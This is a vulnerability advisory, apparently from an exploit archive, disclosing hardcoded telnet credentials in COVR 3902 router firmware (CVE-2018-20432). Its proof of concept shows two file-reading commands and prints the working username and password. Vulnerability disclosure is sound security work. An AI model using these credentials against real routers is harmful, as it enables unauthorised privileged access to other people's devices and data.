COVR 3902 1.01B0 Hardcoded Credentials

COVR 3902 1.01B0 Hardcoded Credentials: Posted Sep 2, 2020; Authored by CSW Research Lab; The COVR 3902 REVA router with firmware 1.01B0 has hardcoded telnet credentials.; tags | exploit; advisories | CVE-2018-20432; SHA-256 | 572222ab17d0c016aa65556b5bf32f77aa7e77cca8fd648f5bbe5d57185a7505; Download | Favorite | View

COVR 3902 1.01B0 Hardcoded Credentials

*Title*: Telnet Hardcoded Credentials

*Summary*:  The latest versions of the firmware have hardcoded default
credentials that can be exploited by an unauthenticated attacker to gain
privileged access to the firmware and to extract sensitive data

*Affected Firmware:*  COVR-3902_REVA_ROUTER_FIRMWARE_v1.01B0

*CVE:* CVE-2018-20432

*Proof of Concept: *
Step 1: “cat ./etc/init0.d/S80telnetd.sh” to get a username
Step 2:  “cat ./etc/config/image_sign” to get a password.

Username: Alphanetworks
Password: wrgac61_dlink.2015_dir883

----------
Cheers !!!
Team CSW Research Lab <http://www.cybersecurityworks.com>

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

COVR 3902 1.01B0 Hardcoded Credentials

COVR 3902 1.01B0 Hardcoded Credentials

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

COVR 3902 1.01B0 Hardcoded Credentials

Share This

COVR 3902 1.01B0 Hardcoded Credentials

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems